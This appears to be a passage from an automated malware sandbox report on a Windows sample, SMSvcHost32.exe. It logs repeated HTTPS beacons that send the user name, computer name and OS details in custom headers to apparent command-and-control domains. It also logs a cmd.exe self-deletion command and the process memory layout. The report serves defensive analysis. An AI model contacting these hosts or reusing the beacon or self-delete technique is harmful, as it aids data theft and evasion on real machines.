| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = spop.lestanzedifederica.com/rpersist4/1197631235 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #4
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | spop.lestanzedifederica.com |
| Server Port | 443 |
| Data Sent | 287 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = spop.lestanzedifederica.com, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = spop.lestanzedifederica.com/rpersist4/1197631235 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #5
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | arb.palaser.eu |
| Server Port | 443 |
| Data Sent | 261 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = arb.palaser.eu, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = arb.palaser.eu/rpersist4/1197631235 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #6
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | arb.palaser.eu |
| Server Port | 443 |
| Data Sent | 261 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = arb.palaser.eu, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = arb.palaser.eu/rpersist4/1197631235 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #7
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | gttopr.space |
| Server Port | 443 |
| Data Sent | 257 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = gttopr.space, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = gttopr.space/rpersist4/1197631235 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #8
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | gttopr.space |
| Server Port | 443 |
| Data Sent | 257 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = gttopr.space, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = gttopr.space/rpersist4/1197631235 |
|
1 | |
| Close Session | - |
|
4 |
Process #11: cmd.exe
50
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 & del /F /Q "C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp" > nul |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x30c |
| Parent PID | 0xe6c (c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D38
0x
D6C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00400000 | 0x004bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00f53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x010b0000 | 0x01101fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001110000 | 0x01110000 | 0x0510ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05370000 | 0x056a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efc0000 | 0x7efc0000 | 0x7f0bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0c0000 | 0x7f0c0000 | 0x7f0e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc1562ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc15630000 | 0x7dfc15630000 | 0x7ffc1562ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\Nd9E1FYi\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 112, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\PING.EXE | os_pid = 0xdb0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x10b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x765a0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e2510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x765bffc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765bb0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x775db440 |
|
1 |
Environment (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\Nd9E1FYi\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #12: smsvchost32.exe
2055
219
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdd4 |
| Parent PID | 0x934 (c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
574
0x
C18
0x
C24
0x
918
0x
DF8
0x
93C
0x
C38
0x
494
0x
C08
0x
EAC
0x
EFC
0x
EE8
0x
F80
0x
AF4
0x
8AC
0x
B5C
0x
638
0x
F74
0x
E04
0x
628
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043efff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x00440fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00451fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00461fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00471fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x00493fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004a0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004b0fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0x004d0000 | 0x004d0fff | Memory Mapped File | rw |
|
|
|
|
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005f0000 | 0x006adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007e2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00870fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00a17fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x00ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x01faffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x020affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x020effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x0212ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x02130fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x0214ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02150000 | 0x02486fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002690000 | 0x02690000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x02991fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x02a8bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x02c03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02aa1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02d11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02c2efff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02fd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02dabfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d10000 | 0x02d10000 | 0x02d11fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d20000 | 0x02d20000 | 0x03018fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d20000 | 0x02d20000 | 0x02d20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d30000 | 0x02d30000 | 0x0312afff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02fa9fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x03231fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x033f0fff | Private Memory | rw |
|
|
|
- |
| wkscli.dll | 0x03130000 | 0x0313ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000003240000 | 0x03240000 | 0x0353dfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003400000 | 0x03400000 | 0x03993fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003540000 | 0x03540000 | 0x038adfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039a0000 | 0x039a0000 | 0x03f37fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f40000 | 0x03f40000 | 0x044d4fff | Private Memory | rwx |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
